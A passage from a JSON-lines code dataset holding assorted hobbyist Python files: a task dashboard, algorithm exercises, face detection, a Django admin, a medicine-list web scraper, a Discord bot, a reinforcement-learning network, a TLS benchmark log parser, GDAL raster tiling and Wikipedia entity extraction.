temp_list.append(task.title)\n return temp_list\n\n def sort_by_title(self):\n return sorted(self.task_list,\n key=lambda task: task.title)\n\n\n\n def dump_to_json(self, filename):\n task_list = [t.__dict__ for t in self.task_list]\n filepath = os.path.join(os.getcwd(),'data', filename)\n with OpenFile(filepath, 'w') as dump_file:\n json.dump(task_list, dump_file)\n\n def load_from_json(self, filename):\n filepath = os.path.join(os.getcwd(), 'data', filename)\n with OpenFile(filepath, 'r+') as dump_file:\n json.load(dump_file)\n\n def dump_csv(self, filename):\n task_list = [t.__dict__ for t in self.task_list]\n\n fieldnames = []\n for task in task_list[0]:\n fieldnames.append(task)\n\n filepath = os.path.join(os.getcwd(),'data', filename)\n with 
OpenFile(filepath, 'w') as file:\n writer = csv.writer(file)\n writer.writerow(fieldnames)\n for task in task_list:\n temp_list = []\n for task_property in task.values():\n temp_list.append(task_property)\n writer.writerow(temp_list)\n\n\n def load_csv(self, filename):\n filepath = os.path.join(os.getcwd(), 'data', filename)\n with OpenFile(filepath, 'r') as file:\n csv.reader(file, delimiter=',')\n\n\nif __name__ == '__main__':\n dashboard_1 = Dashboard()\n dashboard_1.add_task()\n dashboard_1.add_task()\n dashboard_1.dump_csv('proba.csv')\n dashboard_1.load_csv('proba.csv')\n\n\n","repo_name":"kseniajasko/Python_study_group_2","sub_path":"hw_16_10/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42216852785","text":"import sys\nimport os\n\n# os.chdir(\"C:\\\\python\\\\algorithm exam\")\n# sys.stdin = open(\"input.txt\", \"r\")\n\ndef DFS(L, tot, day):\n global max_p\n if day>n:\n return\n if L == n+1:\n if tot>max_p:\n max_p = tot\n return\n if L > day:\n DFS(L+1, tot+sch[L][1], day+sch[L][0])\n DFS(L+1, tot, day+1)\n else:\n DFS(L+1, tot, day) \n\n\nif __name__ == \"__main__\":\n n = int(input())\n sch = [list(map(int, input().split())) for _ in range(n)]\n sch.insert(0,0)\n max_p = 0\n DFS(1, 0, 0)\n print(max_p)\n\n\n# # 해답 코드\n# def DFS(L, tot):\n# global max_p\n# if L > n+1:\n# return\n\n# if L == n+1:\n# if tot>max_p:\n# max_p = tot\n# return\n \n# DFS(L+sch[L][0], tot+sch[L][1])\n# DFS(L+1, tot)\n\n# if __name__ == \"__main__\":\n# n = int(input())\n# sch = [list(map(int, input().split())) for _ in range(n)]\n# sch.insert(0,0)\n# max_p = 0\n# DFS(1, 0)\n# print(max_p)\n","repo_name":"godew/practice-repository","sub_path":"algorithm/python/algorithm exam/7. DFS, BFS 활용/2. 휴가(DFS).py","file_name":"2. 
휴가(DFS).py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70592316600","text":"# 1 1 2 2 3 3 3 3\n# l m r\n# l m r\n# m\n# r l\n\ndef search_l(nums: list[int], target: int) -> list[int]:\n l, r = 0, len(nums) - 1\n\n while l <= r:\n m = (l + r) // 2\n\n if nums[m] >= target:\n r = m - 1\n else:\n l = m + 1\n \n return l\n\n\nclass Solution:\n def searchRange(self, nums: list[int], target: int) -> list[int]:\n if not nums:\n return [-1, -1]\n \n l = search_l(nums, target)\n r = search_l(nums, target + 1)\n \n if l >= len(nums) or nums[l] != target:\n return [-1, -1]\n\n return [l, r - 1]","repo_name":"chehsunliu/a","sub_path":"LeetCode/0034_find-first-and-last-position-of-element-in-sorted-array/20220716-2.py","file_name":"20220716-2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72745394681","text":"import sys, os\nimport cv2\nimport urllib\nimport shutil\n\nfrom Tkinter import *\nfrom os import walk\nfrom urlparse import urlparse\n\nclass Face:\n\n def detect(self,path):\n img = cv2.imread(path)\n cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt.xml\")\n rects = cascade.detectMultiScale(img, 1.01, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))\n\n if len(rects) == 0:\n return [], img\n rects[:, 2:] += rects[:, :2]\n return rects, img\n\n def box(self,rects, img, file_name,folder):\n\n i = 0 # Track how many faces found\n printLabel = \"thisLabel\"\n for x1, y1, x2, y2 in rects:\n i += 1 \n # Increment the face counter\n #print \"Found \" + str(i) + \" face!\" # Tell us what's going on\n cut = img[y1:y2, x1:x2] # Defines the rectangle containing a face\n file_name = file_name.replace('.jpg','_') # Prepare the filename \n file_name = file_name + str(i) + '.jpg'\n file_name = file_name.replace('\\n','')\n printLabel = 'Writing ' + file_name\n\n cv2.imwrite('detected/'+ str(folder)+'/'+ str(file_name), cut) # Write the file\n return printLabel\n \n \nif __name__ == \"__main__\":\n main()","repo_name":"filipinacoder/face-recognition-system","sub_path":"Face.py","file_name":"Face.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43340121529","text":"from django.contrib import admin\nfrom edc_model_admin import audit_fieldset_tuple\n\nfrom ..admin_site import flourish_child_admin\nfrom ..forms import ChildPennCNBForm\nfrom ..models import ChildPennCNB\nfrom .model_admin_mixins import ChildCrfModelAdminMixin\n\n\n@admin.register(ChildPennCNB, site=flourish_child_admin)\nclass ChildPennCNBAdmin(ChildCrfModelAdminMixin, admin.ModelAdmin):\n\n form = ChildPennCNBForm\n\n fieldsets = (\n (None, {\n 'fields': [\n 'child_visit',\n 'report_datetime',\n 'completed',\n 'reason_incomplete',\n 'reason_other',\n 'date_deployed',\n 'start_time',\n 'stop_time',\n 'staff_assisting',\n 'testing_impacted',\n 'impact_other',\n 'claim_experience',\n 'laptop_used',\n 'comments'\n ]}\n ), audit_fieldset_tuple)\n\n filter_horizontal = ('staff_assisting', )\n\n radio_fields = {'completed': admin.VERTICAL,\n 'reason_incomplete': admin.VERTICAL,\n 'testing_impacted': admin.VERTICAL,\n 'laptop_used': admin.VERTICAL,\n 'claim_experience': admin.VERTICAL, 
}\n","repo_name":"flourishbhp/flourish-child","sub_path":"flourish_child/admin/child_penn_cnb_admin.py","file_name":"child_penn_cnb_admin.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33535359296","text":"import requests\nimport bs4\nfrom urllib.error import HTTPError,URLError\nimport lxml\nfrom requests.exceptions import ConnectionError\nimport re\nimport io\n\n\ndef urlopen(url):\n try:\n data = requests.get(url)\n\n except HTTPError as e:\n print(e)\n\n except URLError as e:\n print(e)\n\n except ConnectionError as e:\n print(e)\n\n return data\n\n\n\ndata = urlopen(\"https://www.netmeds.com/prescriptions\")\n\nfdata = bs4.BeautifulSoup(data.text , \"lxml\")\n# print(fdata)\n\n \n\n# a = fdata.select(\".drug-list-col\")\na =fdata.find(\"div\",{\"class\":\"drug-list-col\"})\n# a =fdata.find(\"div\",{\"class\":\"ln-a\"})\n\n# a_list = a.select(\".alpha-drug-list\")\n# a = fdata.select(\".drug-list-col ln-a\")\n# print(a.get_text())\n# a_list = a.select(\".alpha-drug-list\")\n# print(a_list)\n\n# b = fdata.find(\"div\",{\"class\":\"drug-list-col\"})\n\n\n# print(b)\n\n\ndef degit_remove(item):\n\n dj = ['1','2','3','4','5','6','7','8','9',')','(','0']\n answer = ''\n for char in item :\n if char not in dj :\n answer += char\n\n return answer\n\n\n\nb = fdata.find_all(\"ul\",{\"class\":\"alpha-drug-list\"})\nl=[]\nfor item in b:\n for med in item:\n name = med.get_text()\n l.append(name)\n\n# print(l)\nnew =[]\nfor item in l:\n x = degit_remove(item).strip()\n new.append(x)\n\nwith io.open(\"file1.csv\",\"w\",encoding=\"utf8\") as f1:\n f1.write(\"MEDICINE DETAILS \\n\")\n\n\n# print(new)\nall =[]\n\n\nfor item in new :\n \n x = item\n\n new_url = \"https://www.netmeds.com/prescriptions/\"+item \n new_data = urlopen(new_url)\n fnew_data = bs4.BeautifulSoup(new_data.text , 'lxml')\n \n all_tab = fnew_data.find_all(\"ul\",{\"class\":\"alpha-drug-list\"})\n s =[] \n for item in all_tab:\n for med in item:\n name = med.find(\"div\",{\"class\":\"panel-body\"})\n\n with io.open(\"file1.csv\",\"a\",encoding=\"utf-8\") as f1:\n\n f1.write(x + \"\\n\")\n f1.write(name.get_text() + \"\\n\")\n \n\n # print(name.get_text())\n \n# print(s)\n# all.append(s)\n# print(\"done\")\n\n# print(all)\n\n\n\n\n \n","repo_name":"adarshraj365/Scraping-to-netmeds.com","sub_path":"netmeds.py","file_name":"netmeds.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"281194693","text":"#Import modules and connect to Discord\nimport os\nimport discord\nimport random\nfrom dotenv import load_dotenv\n\n\n# Getting motivational quotes ready\nwith open(\"motivation.csv\") as motivation:\n quotes = []\n for line in motivation:\n line = line.replace(\"\\n\", \"\")\n line = line.replace('\"',\"\")\n line = line.split(\"—\")\n quotes.append([x.strip() for x in line])\n\n\n\n\n#Getting the token and guild name from the .env\nload_dotenv()\nTOKEN = os.getenv(\"DISCORD_TOKEN\")\nGUILD = os.getenv('DISCORD_GUILD')\n\n#https://stackoverflow.com/questions/64231025/discord-py-bot-cant-see-members\nintents = discord.Intents.default()\nintents.members = True\n\nclient = discord.Client(intents=intents)\n\n@client.event\nasync def on_ready():\n print(f'{client.user.name} has connected to Discord!')\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n \n if message.content.lower() == 
'!motivation':\n random_quote = random.choice(quotes)\n response = f\"{random_quote[0]} - {random_quote[1]}\"\n await message.channel.send(response)\n \n elif message.content == 'raise-exception':\n raise discord.DiscordException\n\nclient.run(TOKEN)\n\n\n\n\n\n","repo_name":"patricklec/discord_motivation_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9586310881","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n @File: ANet.py\n @Author: Milo\n @Date: 2022/05/30 11:28:06\n @Version: 1.0\n @Description: 动作网络\n'''\n\n\n\nimport torch.nn as nn\nimport torch.nn.functional as nn_f\nimport torch\n\n\n# 动作网络\nclass ANet(nn.Module):\n def __init__(self, in_features, out_features, hidden_1=128, hidden_2=64):\n super(ANet, self).__init__()\n # self.bn = nn.BatchNorm1d(in_features)\n self.fc1 = nn.Linear(in_features, hidden_1)\n self.fc1.weight.data.normal_(0, 0.1)\n self.fc2 = nn.Linear(hidden_1, hidden_2)\n self.fc2.weight.data.normal_(0, 0.1)\n self.fc3 = nn.Linear(hidden_2, hidden_2)\n self.fc3.weight.data.normal_(0, 0.1)\n self.out = nn.Linear(hidden_2, out_features)\n self.out.weight.data.normal_(0, 0.1)\n\n def forward(self, s):\n # s = torch.batch_norm(s)\n x = self.fc1(s)\n x = nn_f.leaky_relu(x)\n x = self.fc2(x)\n x = nn_f.leaky_relu(x)\n x = self.fc3(x)\n x = nn_f.leaky_relu(x)\n x = self.out(x)\n x = torch.sigmoid(x)\n return x\n","repo_name":"Milo-F/THz_PCJS_RL","sub_path":"networks/DDPG/ANet.py","file_name":"ANet.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"24008358611","text":"from stan import StanDict, StanData\nfrom .parser import Parser, ParserError\nfrom tqdm import tqdm\nfrom os import path\nfrom collections import Iterable\n\n# Common operations offsets\nTIMESTAMP = 0\nSTART_TIME_AND_PROCESS_ID = 1\nTHREAD_ID = 2\nCONNECTION_ID = 3\nOPERATION_CODE = 4\n\n# Specific operations offsets\nREQUEST_ID = 5\nREQUEST_FILE_NAME = 6\nSEND_DATA_ID = 6\nSEND_DATA_SIZE = 7\nREQUEST_SEND_DATA_SIZE = 6\n\nRECV_DATA_ID = 6\nRECV_DATA_SIZE = 7\nRESPONSE_RECV_DATA_SIZE = 6\n\nSSL_SEND_DATA_SIZE = 5\nSSL_RECV_DATA_SIZE = 6\n\n# Operations codes\nSTART_ASYNC = '0'\nSUCCESS_ASYNC = '1'\nFAILED_ASYNC = '2'\n\nSTART_SSL_HANDSHAKE = '3'\nSUCCESS_SSL_HANDSHAKE = '4'\nFAILED_SSL_HANDSHAKE = '5'\n\nSTART_SEND_REQ = '6'\nSTART_SEND_DATA = '7'\nSUCCESS_SEND_DATA = '8'\nFAILED_SEND_DATA = '9'\nFINISH_SEND_REQ = '10'\nFAILED_SEND_REQ = '11'\n\nSTART_RECV_RSP = '12'\nSTART_RECV_DATA = '13'\nSUCCESS_RECV_DATA = '14'\nFAILED_RECV_DATA = '15'\nSUCCESS_RECV_RSP = '16'\nFAILED_RECV_RSP = '17'\n\nCLOSE_SSL_CONNECTION = '18'\n\n\nclass TlsMeterStatFile:\n\n def __init__(self, file_path):\n\n self.sampling_interval = 's'\n self.tlsm_log_file = file_path\n\n self.stat = dict(\n timestamp=[],\n\n tcp_connections_per_second=[],\n ssl_connections_per_second=[],\n throughput_upload=[],\n throughput_download=[],\n req_per_second=[],\n rsp_per_second=[],\n active_tcp_connections_count=[],\n active_ssl_connections_count=[],\n\n tcp_times=[],\n ssl_handshake_times=[],\n ttfb_times=[],\n connection_times=[],\n\n failed_tcp_per_second=[],\n failed_ssl_per_second=[],\n failed_req_per_second=[],\n failed_rsp_per_second=[],\n failed_total_per_second=[]\n )\n\n self._connections_start_times = dict()\n self._success_tcp_connections = set()\n 
self._success_ssl_connections = set()\n self._failed_req_rsp_connections = set()\n\n def _get_time_interval(self, timestamp: int) -> int:\n \"\"\"\n \"Round\" the timestamp to the specified interval\n\n :param timestamp: nanosecond\n :return: time interval timestamp (Unix time)\n \"\"\"\n # TODO: Expand the supported averaging intervals\n if self.sampling_interval == 's':\n return timestamp//10**9\n\n def _process_operation(self, operation: list):\n # Unique connection ID in the context of all processes and threads of tls_meter\n connection_id = '_'.join([operation[THREAD_ID], operation[CONNECTION_ID]])\n\n operation_timestamp = int(operation[TIMESTAMP])\n operation_time_interval = self._get_time_interval(operation_timestamp)\n\n # If the first or the new interval, then we add new records to the statistics\n if len(self.stat['timestamp']) == 0 or operation_time_interval > self.stat['timestamp'][-1]:\n self.stat['timestamp'].append(operation_time_interval)\n self.stat['tcp_connections_per_second'].append(0)\n self.stat['ssl_connections_per_second'].append(0)\n self.stat['throughput_upload'].append(0)\n self.stat['throughput_download'].append(0)\n self.stat['req_per_second'].append(0)\n self.stat['rsp_per_second'].append(0)\n self.stat['active_tcp_connections_count'].append(self.stat['active_tcp_connections_count'][-1]\n if len(self.stat['active_tcp_connections_count']) != 0\n else 0)\n self.stat['active_ssl_connections_count'].append(self.stat['active_ssl_connections_count'][-1]\n if len(self.stat['active_ssl_connections_count']) != 0\n else 0)\n\n self.stat['tcp_times'].append([])\n self.stat['ssl_handshake_times'].append([])\n self.stat['ttfb_times'].append([])\n self.stat['connection_times'].append([])\n\n self.stat['failed_tcp_per_second'].append(0)\n self.stat['failed_ssl_per_second'].append(0)\n self.stat['failed_req_per_second'].append(0)\n self.stat['failed_rsp_per_second'].append(0)\n self.stat['failed_total_per_second'].append(0)\n\n if operation[OPERATION_CODE] == START_ASYNC:\n self._connections_start_times[connection_id] = operation_timestamp\n elif operation[OPERATION_CODE] == SUCCESS_ASYNC:\n self.stat['tcp_connections_per_second'][-1] += 1\n self.stat['active_tcp_connections_count'][-1] += 1\n self._success_tcp_connections.add(connection_id)\n self.stat['tcp_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n elif operation[OPERATION_CODE] == FAILED_ASYNC:\n self.stat['failed_tcp_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == START_SSL_HANDSHAKE:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_SSL_HANDSHAKE:\n self.stat['ssl_connections_per_second'][-1] += 1\n self.stat['active_ssl_connections_count'][-1] += 1\n self._success_ssl_connections.add(connection_id)\n self.stat['ssl_handshake_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n elif operation[OPERATION_CODE] == FAILED_SSL_HANDSHAKE:\n self.stat['failed_ssl_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == START_SEND_REQ:\n pass\n elif operation[OPERATION_CODE] == START_SEND_DATA:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_SEND_DATA:\n self.stat['throughput_upload'][-1] += int(operation[SEND_DATA_SIZE])\n elif operation[OPERATION_CODE] == FAILED_SEND_DATA:\n pass\n elif operation[OPERATION_CODE] == FINISH_SEND_REQ:\n self.stat['req_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == FAILED_SEND_REQ:\n 
self.stat['failed_req_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n self._failed_req_rsp_connections.add(connection_id)\n elif operation[OPERATION_CODE] == START_RECV_RSP:\n if operation[REQUEST_ID] == '1':\n self.stat['ttfb_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n elif operation[OPERATION_CODE] == START_RECV_DATA:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_RECV_DATA:\n self.stat['throughput_download'][-1] += int(operation[RECV_DATA_SIZE])\n elif operation[OPERATION_CODE] == FAILED_RECV_DATA:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_RECV_RSP:\n self.stat['rsp_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == FAILED_RECV_RSP:\n self.stat['failed_rsp_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n self._failed_req_rsp_connections.add(connection_id)\n elif operation[OPERATION_CODE] == CLOSE_SSL_CONNECTION:\n if connection_id in self._success_tcp_connections:\n self.stat['active_tcp_connections_count'][-1] -= 1\n if connection_id in self._success_ssl_connections:\n self.stat['active_ssl_connections_count'][-1] -= 1\n if connection_id not in self._failed_req_rsp_connections:\n self.stat['connection_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n\n def parse(self):\n with open(self.tlsm_log_file, 'r') as stat_file:\n\n file_size = sum(1 for l in open(self.tlsm_log_file))\n desc = '{}'.format(path.basename(self.tlsm_log_file))\n\n for line in tqdm(stat_file, total=file_size, desc=desc):\n if line[0].isdigit():\n operation = line.strip().split(';')\n self._process_operation(operation)\n\n return {ts: {metric: self.stat[metric][n]\n for metric in self.stat if metric is not 'timestamp'}\n for n, ts in enumerate(self.stat['timestamp'])}\n\n\nclass TlsmCsvParser(Parser):\n def __init__(self):\n self.stat_files = None\n self.stat = dict()\n\n def parse(self, file_paths: Iterable):\n if self.stat_files is not None:\n self.__init__()\n\n self.stat_files = file_paths\n\n for file in tqdm(self.stat_files, desc='Total'):\n\n tlsm_stat = TlsMeterStatFile(file)\n _stat = tlsm_stat.parse()\n\n for time in _stat:\n if time in self.stat:\n for metric in _stat[time]:\n self.stat[time][metric] += _stat[time][metric]\n else:\n self.stat[time] = _stat[time]\n\n for time in tqdm(self.stat, desc='Calculating average time stats'):\n for time_metric in {'tcp_times', 'ssl_handshake_times', 'ttfb_times', 'connection_times'}:\n self.stat[time][time_metric] = sum(self.stat[time][time_metric]) /\\\n (1 if len(self.stat[time][time_metric]) == 0\n else len(self.stat[time][time_metric])) /\\\n 1000000\n\n def get_stat(self) -> StanData:\n result = StanData()\n for ts in self.stat:\n metrics = StanDict()\n for metric in self.stat[ts]:\n metrics[metric] = self.stat[ts][metric]\n result.append(ts, metrics)\n\n return result\n","repo_name":"itsens/stan","sub_path":"stan/parser/tlsm.py","file_name":"tlsm.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33095633221","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 21 07:48:23 2019\r\n\r\n@author: medad\r\n\"\"\"\r\n\r\nimport os\r\nfrom osgeo import gdal\r\nimport numpy as np\r\nimport osgeo.ogr as ogr\r\nfrom osgeo import gdalconst\r\nimport subprocess\r\n\r\n\r\ndef createFolder(path):\r\n\tpath2 = os.path.dirname(path)\r\n\tprint (path2)\r\n\ttry:\r\n\t\tdic2 = path2 +'\\\\'+ 'TrainSet'\r\n\t\tif 
not os.path.exists(dic2):\r\n\t\t\tos.makedirs(dic2)\r\n\t\t\tprint ('Createrd folder {}'.format(dic2))\r\n\t\telse:\r\n\t\t\tprint ('folder {} is already created'.format(dic2))\r\n\texcept OSError:\r\n\t\tprint (\"Error Create dic\")\r\n \r\n\treturn dic2\r\n \r\n\r\ndef avr_bands(in_ds):\r\n \r\n name = os.path.basename(in_ds).split('.')[0]\r\n out = os.path.dirname(in_ds) + '\\\\'+name+'_gray.tif'\r\n in_ds = gdal.Open(in_ds)\r\n num_bands = in_ds.RasterCount\r\n band1 = in_ds.GetRasterBand(1) \r\n band2 = in_ds.GetRasterBand(2) \r\n band3 = in_ds.GetRasterBand(3)\r\n red = band1.ReadAsArray()*0.3\r\n blue = band3.ReadAsArray()*0.11\r\n if num_bands == 4:\r\n band4 = in_ds.GetRasterBand(4)\r\n green_inf = np.mean([band2.ReadAsArray(),band4.ReadAsArray()],axis = 0)*0.59\r\n else:\r\n print (\"didn't find the 4th band\")\r\n green_inf = np.mean([band2.ReadAsArray()],axis = 0)*0.59\r\n \r\n new_array = np.sum([green_inf,blue,red],axis = 0)\r\n driver = gdal.GetDriverByName('GTiff')\r\n out_ds = driver.Create(out, in_ds.RasterXSize, in_ds.RasterYSize, 1, gdal.GDT_CFloat64)\r\n \r\n out_ds.SetProjection (in_ds.GetProjection())\r\n out_ds.SetGeoTransform(in_ds.GetGeoTransform())\r\n \r\n out_band = out_ds.GetRasterBand(1)\r\n out_band.WriteArray (new_array)\r\n out_band.FlushCache ()\r\n out_ds.FlushCache ()\r\n\r\n return out\r\n\r\n\r\ndef get_img_shp(folder):\r\n img = []\r\n shp = []\r\n for root, dirs, files in os.walk(folder):\r\n for file in files:\r\n if file.endswith('tif'):\r\n img.append(root +'\\\\' + file)\r\n if file.endswith('shp'):\r\n shp.append(root +'\\\\' + file)\r\n \r\n \r\n return shp,img\r\n\r\n\r\ndef Cut_raster_to_pices(path_raster,out_put_folder,name = 'None',tilesize = 512):\r\n \r\n in_ds = gdal.Open(path_raster)\r\n width = in_ds.RasterXSize\r\n height = in_ds.RasterYSize\r\n\r\n for i in range(0,width,tilesize):\r\n for j in range(0,height,tilesize):\r\n w = tilesize\r\n h = tilesize\r\n gdaltranString = \"gdal_translate -of GTIFF -srcwin \"+str(i)+\", \"+str(j)+\", \"+str(w)+\", \" \\\r\n +str(h)+\" \" + path_raster + \" \" + out_put_folder + \"\\\\_\"+ str(name) +str(i)+\"_\"+str(j)+\".tif\"\r\n os.system(gdaltranString)\r\n\r\n\r\ndef del_ras(folder,by_name):\r\n delete = 0\r\n no_del = 0\r\n for root, dirs, files in os.walk(folder):\r\n for file in files:\r\n if file.endswith('tif'):\r\n if by_name in file:\r\n try:\r\n os.remove(root +'\\\\' + file)\r\n delete += 1\r\n except:\r\n print ('coudnt delete: {}'.format(root +'\\\\' + file))\r\n no_del += 1\r\n print ('total deleted: {}'.format(delete))\r\n print ('total coudnt deleted: {}'.format(no_del))\r\n\r\ndef RasterRize_gdal(ndsm,shp,output):\r\n \r\n\r\n data = gdal.Open(ndsm, gdalconst.GA_ReadOnly)\r\n geo_transform = data.GetGeoTransform()\r\n \r\n x_min = geo_transform[0]\r\n y_max = geo_transform[3]\r\n y_min = y_max + geo_transform[5] * data.RasterYSize\r\n x_res = data.RasterXSize\r\n y_res = data.RasterYSize\r\n mb_v = ogr.Open(shp)\r\n mb_l = mb_v.GetLayer()\r\n pixel_width = geo_transform[1]\r\n \r\n target_ds = gdal.GetDriverByName('GTiff').Create(output, x_res, y_res, 1, gdal.GDT_Byte)\r\n target_ds.SetGeoTransform((x_min, pixel_width, 0, y_min, 0, pixel_width))\r\n band = target_ds.GetRasterBand(1)\r\n NoData_value = -999999\r\n band.SetNoDataValue(NoData_value)\r\n band.FlushCache()\r\n gdal.RasterizeLayer(target_ds, [1], mb_l, options=[\"ATTRIBUTE=Class_num\"])\r\n \r\n target_ds = None\r\n \r\n return output\r\n\r\n\r\ndef del_zero_value_in_raster(folder):\r\n rasters = []\r\n file_type = 
r'tif'\r\n \r\n for root, dirs, files in os.walk(folder):\r\n for f in files:\r\n if f.endswith(file_type):\r\n rasters.append(root +'\\\\'+f)\r\n \r\n \r\n for ras in rasters:\r\n raster = gdal.Open(ras)\r\n \r\n \r\n num_bands = raster.RasterCount\r\n \r\n num = 0\r\n for i in range(1,num_bands+1):\r\n band = raster.GetRasterBand(i)\r\n band_array = band.ReadAsArray()\r\n mean_band = np.mean(band_array)\r\n num += mean_band\r\n \r\n del raster\r\n del band\r\n del band_array\r\n del mean_band\r\n \r\n if num == 0:\r\n os.remove(ras)\r\n print (\"deleted {} because of no value\".format(ras))\r\n else:\r\n pass\r\n #print (\"{} have_value\".format(ras))\r\n\r\n\r\n\r\ndef get_list_of_Values(shp_in,attri):\r\n driver = ogr.GetDriverByName('ESRI Shapefile')\r\n dataSource = driver.Open(shp_in,0)\r\n layer = dataSource.GetLayer()\r\n list_field = [attri]\r\n value_list = []\r\n for feature in layer:\r\n value_list.append([feature.GetField(j) for j in list_field][0])\r\n \r\n value_list = list(set(value_list))\r\n return value_list\r\n\r\n\r\ndef RasterizShape_subprocess(shp_in,img_ref,name):\r\n\r\n print (os.path.dirname(shp_in) + '\\\\' + 'LBL_{}.tif'.format(str(name)))\r\n img_out = os.path.dirname(shp_in) + '\\\\' + 'LBL_{}.tif'.format(str(name))\r\n \r\n img_ref = gdal.Open(img_ref)\r\n img_ref_cols = img_ref.RasterXSize\r\n img_ref_rows = img_ref.RasterYSize\r\n geotransform = img_ref.GetGeoTransform()\r\n top_left_X = geotransform[0]\r\n pixel_size = float(geotransform[1]) # pixel size in the X direction\r\n top_left_Y = geotransform[3]\r\n xmin = top_left_X\r\n ymin = top_left_Y - img_ref_rows*pixel_size\r\n xmax = top_left_X + img_ref_cols*pixel_size\r\n ymax = top_left_Y \r\n\r\n print (\"[info]runing the tool\")\r\n subprocess.call('gdal_rasterize --config GDAL_CACHEMAX 10000 -ot Byte -te {} {} {} {} -tr {} {} -a CLASS {} {} -where \"Class_num = {}\"'.format(xmin,str(name)),shell = True)\r\n \r\n return img_out\r\n\r\n\r\n\r\nshp_path = r'C:\\Users\\medad\\python\\GIStools\\TREES\\data\\Pre_ML\\Sample_3.shp'\r\nraster_path = r\"C:\\GIS_layers\\raster\\ortho\\RSH-1231_ITM_20cm_CNZ.tif\"\r\n\r\nfolder = createFolder(shp_path)\r\n#Cut_raster_to_pices(raster_path,folder,name = 'None',tilesize = 512)\r\n\r\nname_ras = os.path.dirname(folder) + '\\\\' +'rastarize_shp.tif'\r\nRasterRize_gdal(raster_path,shp_path,name_ras)\r\n \r\nCut_raster_to_pices(name_ras,folder,name = 'ras_shp_',tilesize = 512)\r\n\r\n\r\n#shps,imgs = get_img_shp(folder)\r\n#num = 0\r\n#for img in imgs:\r\n# try:\r\n# if 'gray' not in img:\r\n# avr_bands(img)\r\n# if num%10 == 0:\r\n# print (num)\r\n# \r\n# num +=1\r\n# except:\r\n# print (\"coudnt make: {} \".format(img))\r\n## \r\n#\r\n#list_val = get_list_of_Values(shp_path,'CLASS')\r\n#list_val = [15,31,7]\r\n#for val in list_val:\r\n# print (' # # working on {} # # '.format(val))\r\n# img_out = RasterizShape_subprocess (shp_path,raster_path,str(val))\r\n# Cut_raster_to_pices(img_out,folder,name = 'LBL_'+ str(val) +'_',tilesize = 512)\r\n#\r\n\r\ndel_zero_value_in_raster(folder)\r\n\r\n","repo_name":"OrLeaKatz/TreeDetection","sub_path":"medad/Gdal/Pre_ML_Trees.py","file_name":"Pre_ML_Trees.py","file_ext":"py","file_size_in_byte":7534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30644766153","text":"from textblob import TextBlob\nfrom textblob.np_extractors import ConllExtractor\nfrom textblob.taggers import NLTKTagger\nfrom textblob import Word\nimport wikipediaapi\n\n\nnltk_tagger = 
NLTKTagger()\ngood_PoS_Tags = [\"NN\", \"NNS\", \"NNP\", \"NNPS\"]\nwiki_wiki = wikipediaapi.Wikipedia('en')\n\ndef wikicategories(category):\n page_py = wiki_wiki.page(category)\n if len(category) > 2 and page_py.exists() and (\"refer to:\" != page_py.summary[-9:]):\n return page_py.title\n return \"\"\n\ndef getShingles(target_tweet):\n\n entityDict = {}\n\n blob = TextBlob(target_tweet, pos_tagger=nltk_tagger)\n\n try:\n keywords = blob.pos_tags\n lastNoun = \"\"\n\n for taggedTuple in keywords:\n\n keyword = taggedTuple[0]\n tag = taggedTuple[1]\n\n if tag in good_PoS_Tags:\n\n wikiTitle = wikicategories(keyword.lower())\n # check if wiki article exists for entity\n if wikiTitle and keyword.lower() != \"gift\":\n\n if keyword.lower() in entityDict:\n entityDict[wikiTitle.lower()] += blob.sentiment.polarity\n else:\n entityDict[wikiTitle.lower()] = blob.sentiment.polarity\n\n if(lastNoun):\n\n keyword = lastNoun + \" \" + keyword\n wikiTitle = wikicategories(keyword.lower())\n print(keyword)\n if wikiTitle and keyword.lower() != \"gift\":\n\n if keyword.lower() in entityDict:\n entityDict[wikiTitle.lower()] += blob.sentiment.polarity\n else:\n entityDict[wikiTitle.lower()] = 